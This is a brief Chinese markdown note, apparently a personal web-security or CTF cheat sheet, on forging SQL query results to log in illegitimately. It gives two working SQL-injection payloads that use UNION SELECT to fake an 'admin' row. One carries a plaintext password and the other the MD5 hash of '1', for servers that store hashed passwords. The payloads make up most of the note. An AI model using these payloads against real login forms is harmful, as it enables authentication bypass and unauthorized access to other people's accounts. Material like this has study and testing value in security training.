查询结果伪造.md

有时通过注入可以伪造查询结果，达到非法登录的效果

name=1' union select 1, 'admin', '1'#&pw=1

如上，我们伪造了一个名为admin，密码为1的查询结果，然后传递url查询pw=1，于是服务器认为我们拥有admin正确的密码，成功登录

需要注意的是，由于服务端可能将密码经过md5计算后存储，因此我们伪造的查询结果也应当经过md5

name=1' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b'#&pw=1

#Web #SQL注入 #查询结果伪造